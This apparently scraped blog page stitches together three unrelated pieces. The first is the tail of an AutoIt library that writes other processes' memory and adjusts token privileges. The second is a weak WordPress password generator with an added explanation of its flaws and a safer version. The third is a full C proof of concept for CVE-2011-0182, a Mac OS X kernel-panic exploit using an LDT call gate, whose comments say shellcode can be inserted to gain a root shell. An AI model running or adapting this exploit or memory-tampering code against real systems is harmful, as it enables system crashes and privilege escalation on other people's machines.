        SetError(@Error + 1)
        Return 0
    Else
        DllStructSetData($v_Buffer, 1, $v_Data)
        If @Error Then
            SetError(6)
            Return 0
        EndIf
    EndIf
   
    DllCall($ah_Handle[0], 'int', 'WriteProcessMemory', 'int', $ah_Handle[1], 'int', $iv_Address, 'ptr', DllStructGetPtr($v_Buffer), 'int', DllStructGetSize($v_Buffer), 'int', '')
   
    If Not @Error Then
        Return 1
    Else
        SetError(7)
        Return 0
    EndIf
   
EndFunc

;==========================================================
; Function:            _MemoryClose($ah_Handle)
; Description:        Closes the process handle opened by using _MemoryOpen().
; Parameter(s):        $ah_Handle - An array containing the Dll handle and the handle
;                                 of the open process as returned by _MemoryOpen().
; Return Value(s):    On Success - Returns 1
;                    On Failure - Returns 0
;                    @Error - 0 = No error.
;                             1 = Invalid $ah_Handle.
;                             2 = Unable to close the process handle.
; Author(s):        Nomad
; Note(s):
;===========================================================
Func _MemoryClose($ah_Handle)
   
    If Not IsArray($ah_Handle) Then
        SetError(1)
        Return 0
    EndIf
   
    DllCall($ah_Handle[0], 'int', 'CloseHandle', 'int', $ah_Handle[1])
    If Not @Error Then
        DllClose($ah_Handle[0])
        Return 1
    Else
        DllClose($ah_Handle[0])
        SetError(2)
        Return 0
    EndIf
   
EndFunc

;===========================================================
; Function:            SetPrivilege( $privilege, $bEnable )
; Description:        Enables (or disables) the $privilege on the current process
;                   (Probably) requires administrator privileges to run
;
; Author(s):        Larry (from autoitscript.com's Forum)
; Notes(s):
; http://www.autoitscript.com/forum/index.php?s=&showtopic=31248&view=findpost&p=223999
;===========================================================

Func SetPrivilege( $privilege, $bEnable )
   
    Const $TOKEN_ADJUST_PRIVILEGES = 0x0020
    Const $TOKEN_QUERY = 0x0008
    Const $SE_PRIVILEGE_ENABLED = 0x0002
    Local $hToken, $SP_auxret, $SP_ret, $hCurrProcess, $nTokens, $nTokenIndex, $priv
    $nTokens = 1
    $LUID = DLLStructCreate("dword;int")
    If IsArray($privilege) Then    $nTokens = UBound($privilege)
    $TOKEN_PRIVILEGES = DLLStructCreate("dword;dword[" & (3 * $nTokens) & "]")
    $NEWTOKEN_PRIVILEGES = DLLStructCreate("dword;dword[" & (3 * $nTokens) & "]")
    $hCurrProcess = DLLCall("kernel32.dll","hwnd","GetCurrentProcess")
    $SP_auxret = DLLCall("advapi32.dll","int","OpenProcessToken","hwnd",$hCurrProcess[0],   _
            "int",BitOR($TOKEN_ADJUST_PRIVILEGES,$TOKEN_QUERY),"int_ptr",0)
    If $SP_auxret[0] Then
        $hToken = $SP_auxret[3]
        DLLStructSetData($TOKEN_PRIVILEGES,1,1)
        $nTokenIndex = 1
        While $nTokenIndex <= $nTokens
            If IsArray($privilege) Then
                $priv = $privilege[$nTokenIndex-1]
            Else
                $priv = $privilege
            EndIf
            $ret = DLLCall("advapi32.dll","int","LookupPrivilegeValue","str","","str",$priv,   _
                    "ptr",DLLStructGetPtr($LUID))
            If $ret[0] Then
                If $bEnable Then
                    DLLStructSetData($TOKEN_PRIVILEGES,2,$SE_PRIVILEGE_ENABLED,(3 * $nTokenIndex))
                Else
                    DLLStructSetData($TOKEN_PRIVILEGES,2,0,(3 * $nTokenIndex))
                EndIf
                DLLStructSetData($TOKEN_PRIVILEGES,2,DllStructGetData($LUID,1),(3 * ($nTokenIndex-1)) + 1)
                DLLStructSetData($TOKEN_PRIVILEGES,2,DllStructGetData($LUID,2),(3 * ($nTokenIndex-1)) + 2)
                DLLStructSetData($LUID,1,0)
                DLLStructSetData($LUID,2,0)
            EndIf
            $nTokenIndex += 1
        WEnd
        $ret = DLLCall("advapi32.dll","int","AdjustTokenPrivileges","hwnd",$hToken,"int",0,   _
                "ptr",DllStructGetPtr($TOKEN_PRIVILEGES),"int",DllStructGetSize($NEWTOKEN_PRIVILEGES),   _
                "ptr",DllStructGetPtr($NEWTOKEN_PRIVILEGES),"int_ptr",0)
        $f = DLLCall("kernel32.dll","int","GetLastError")
    EndIf
    $NEWTOKEN_PRIVILEGES=0
    $TOKEN_PRIVILEGES=0
    $LUID=0
    If $SP_auxret[0] = 0 Then Return 0
    $SP_auxret = DLLCall("kernel32.dll","int","CloseHandle","hwnd",$hToken)
    If Not $ret[0] And Not $SP_auxret[0] Then Return 0
    return $ret[0]
EndFunc   ;==>SetPrivilege

#endregion

10 October 2011

pwtool.php wp security

//From inc/admin/pwtool.php:
echo "Strong Password: " . '' . make_password(15) . "";


//From libs/functions.php:
if (!function_exists('make_password')) :
    /**
     * @public
     * @uses make_seed()
     * Generate a strong password
     * @return string
     */
    function make_password($password_length)
    {
        srand(make_seed());
        $alfa = "!@123!@4567!@890qwer!@tyuiopa@!sdfghjkl@!zxcvbn@!mQWERTYUIO@!PASDFGH@!JKLZXCVBNM!@";
        $token = "";
        for($i = 0; $i < $password_length; $i ++) {
          $token .= $alfa[rand(0, strlen($alfa))];
        }
        return $token;
    }
endif;





http://pastebin.com/4rJjz3S2
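
Added example, not part of the plugin or the original post: in the listing above, `rand(0, strlen($alfa))` is inclusive at both ends, so it can index one past the end of the string (yielding an empty character and a shorter password), `srand()`/`rand()` is not a cryptographically secure generator, and the alphabet repeats `!` and `@`, so those two characters are picked far more often than the rest. The function name `make_password_csprng` and the helper `alphabet_weights` are assumptions made for this sketch; it measures the alphabet bias and shows a generator without those three problems.

```php
<?php
declare(strict_types=1);

// Alphabet string copied from the make_password() listing above.
const LEGACY_ALPHABET = "!@123!@4567!@890qwer!@tyuiopa@!sdfghjkl@!zxcvbn@!mQWERTYUIO@!PASDFGH@!JKLZXCVBNM!@";

/**
 * Share of alphabet positions occupied by each character. With uniform
 * index selection this is the per-position probability of that character.
 */
function alphabet_weights(string $alphabet): array
{
    $weights = [];
    foreach (count_chars($alphabet, 1) as $byte => $count) {
        $weights[chr($byte)] = $count / strlen($alphabet);
    }
    arsort($weights);
    return $weights;
}

/**
 * Hypothetical hardened replacement (name is an assumption):
 * - random_int() draws from the OS CSPRNG, so there is no srand() seed to guess
 * - the upper bound is count - 1, so the index never runs past the alphabet
 * - the alphabet is deduplicated so every character is equally likely
 */
function make_password_csprng(int $length, string $alphabet = LEGACY_ALPHABET): string
{
    if ($length < 1) {
        throw new InvalidArgumentException('length must be >= 1');
    }
    $chars = array_values(array_unique(str_split($alphabet)));
    $max = count($chars) - 1;
    $token = '';
    for ($i = 0; $i < $length; $i++) {
        $token .= $chars[random_int(0, $max)];
    }
    return $token;
}

// Show the two most over-represented characters, then one generated password.
$top = array_slice(alphabet_weights(LEGACY_ALPHABET), 0, 2, true);
foreach ($top as $char => $share) {
    printf("legacy alphabet: '%s' fills %.1f%% of positions\n", $char, $share * 100);
}
echo make_password_csprng(15), "\n";
```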

09 October 2011

Mac OS X < 10.6.7 Kernel Panic Exploit

/*
Mac OS X < 10.6.7 Kernel Panic Exploit
CVE-2011-0182, Proof Of Concept Code

Author - Chanam Park (hkpco)

Date - 2011. 06
Contact - chanam.park@hkpco.kr , http://hkpco.kr , @hkpco

Thanks for inspiration / x82, riaf.

*/
// Compile: gcc -o CVE-2011-0182_PoC CVE-2011-0182_PoC.c -m32

#include

#include

#include


#include

#include
#include

void dummy_func( void ) { asm volatile( ".byte 0xff" ); }


int main( void )

{
int ret;
union ldt_entry cgate, cgate2;
char dummy[128] = {0x00,};

cgate.call_gate.offset00 = (unsigned int)dummy_func & 0xffff;

cgate.call_gate.offset16 = ((unsigned int)dummy_func >> 16) & 0xffff;
// You can input shellcode address value here to get the root shell.
/* I got the root shell before. But, It was tested on Hackintosh for AMD. :-p
The normal system has a little different environment.
I have no time for this anymore because of my summer break is over.
So.. Good Luck! */

cgate.call_gate.argcnt = 0;

cgate.call_gate.type = 0xc; // DESC_CALL_GATE
cgate.call_gate.dpl = 3;
cgate.call_gate.present = 1;

cgate.call_gate.seg.rpl = 0;

cgate.call_gate.seg.ti = 0;
cgate.call_gate.seg.index = 16;

cgate2.call_gate.offset00 = 0x0;


cgate2.call_gate.seg.rpl = 0;

cgate2.call_gate.seg.ti = 0;
cgate2.call_gate.seg.index = 0;

cgate2.call_gate.argcnt = 0;

cgate2.call_gate.type = 0;
cgate2.call_gate.dpl = 0;
cgate2.call_gate.present = 1;

cgate2.call_gate.offset16 = 0x0;


printf( "// coded by Chanam Park (hkpco)\n\n" );


ret = i386_set_ldt( LDT_AUTO_ALLOC, &cgate, 1 );

printf( "Selector Number in LDT <1>: 0x%x\n", ret );

ret = i386_set_ldt( LDT_AUTO_ALLOC, &cgate2, 1 );

printf( "Selector Number in LDT <2>: 0x%x\n\n", ret );

printf( "If you run this program, it can possibly cause \"Kernel Panic\".\n" );

printf( "The program will be continued when you input any value.\n" );
printf( "-> " );
fflush(stdout);
scanf( "%s", dummy );

asm volatile( "lcall $0x3f, $0x0" );

// Trigger

return 0;

}